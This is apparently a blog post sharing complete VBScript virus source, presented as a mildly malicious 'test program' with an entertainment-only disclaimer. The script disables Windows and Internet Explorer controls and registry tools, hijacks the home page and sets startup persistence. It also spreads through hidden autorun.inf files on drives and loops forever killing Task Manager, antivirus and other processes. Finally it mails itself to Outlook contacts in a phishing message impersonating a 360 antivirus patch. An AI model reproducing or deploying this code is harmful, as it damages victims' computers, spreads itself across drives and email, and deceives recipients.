Vbs 测试程序一

转载请注明出处

有点小恶意哦！慎重测试

'This procedure is written in SeChaos, only for entertainment, not malicious communication, crack or rewrite.I am not liable, the final interpretation of all SeChaos.
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'To modify the registry (start menu which things and the IE settings)
wsh.Regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainSearch Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
wsh.Regwrite "HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKCRDriveshell","auto"
wsh.Regwrite "HKCRDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshell","auto"
wsh.Regwrite "HKCRDirectoryshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat '%1'"
'Modify default file Icon
wsh.Regwrite "HKCRexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCR xtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClasses xtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSoftwareCLASSES.reg","txtfile"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊，Chaobs和你开个小小的玩笑"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了，赶快杀毒或者与QQ5788*****联系"
'Copy itself to the C, D, E, F, U disk
myfile.copy "c:"
myfile.copy "D:"
myfile.copy "E:"
myfile.copy "F:"
myfile.copy "I:"
myfile.attributes=34
'Define the Autorun.inf content that is U disk virus must be part of the code
If fso.FileExists("C:autorun.inf") Then
Set objFolder = fso.GetFile("C:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:autorun.inf"_
&"&& echo open=NYboy.bat >>C:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>C:autorun.inf"_
&"&& echo shell=Auto>>C:autorun.inf"_
&"&& attrib +h +s +r C:autorun.inf"
set autobatc=fso.createtextfile("c:NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:autorun.inf") Then
Set objFolder = fso.GetFile("D:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:autorun.inf"_
&"&& echo open=NYboy.bat >>D:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>D:autorun.inf"_
&"&& echo shell=Auto>>D:autorun.inf"_
&"&& attrib +h +s +r D:autorun.inf"
set autobatd=fso.createtextfile("D:NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:autorun.inf") Then
Set objFolder = fso.GetFile("E:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:autorun.inf"_
&"&& echo open=NYboy.bat >>E:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>E:autorun.inf"_
&"&& echo shell=Auto>>E:autorun.inf"_
&"&& attrib +h +s +r E:autorun.inf"
set autobate=fso.createtextfile("E:NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:autorun.inf") Then
Set objFolder = fso.GetFile("F:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:autorun.inf"_
&"&& echo open=NYboy.bat >>F:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>F:autorun.inf"_
&"&& echo shell=Auto>>F:autorun.inf"_
&"&& attrib +h +s +r F:autorun.inf"
set autobatf=fso.createtextfile("F:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:autorun.inf") Then
Set objFolder = fso.GetFile("I:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:autorun.inf"_
&"&& echo open=NYboy.bat >>I:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>I:autorun.inf"_
&"&& echo shell=Auto>>I:autorun.inf"_
&"&& attrib +h +s +r I:autorun.inf"
set autobatf=fso.createtextfile("I:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Set attributes for the system read only hidden virus body
wsh.run "cmd /c attrib +h +s +r C:NYboy.bat"_
&"&& attrib +h +s +r D:NYboy.bat"_
&"&& attrib +h +s +r E:NYboy.bat"_
&"&& attrib +h +s +r F:NYboy.bat"_
&"&& attrib +h +s +r I:NYboy.bat"
'Mandatory end of certain processes, such as QQ, Notepad, webpage, batch file, carbachol, realplay process, after running to open these files
do
set ws=getobject("winmgmts:\. ootcimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'The virus can be spread by mail
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="360病毒测试"
Mail.Body="尊敬的用户您好：为了更好的服务用户，加强360病毒防范能力，特发此补丁，详细可在官网查询。具体测试请按随信附件进行，您可能需要关闭或阻止旧版360运行以便在线升级。谢谢合作 360研发中心"
Mail.Attachments.Add("c:NYboy.vbs")
Mail.Send
Next
ol.Quit

不要想你能为世界做什么，想想你该为世界做什么！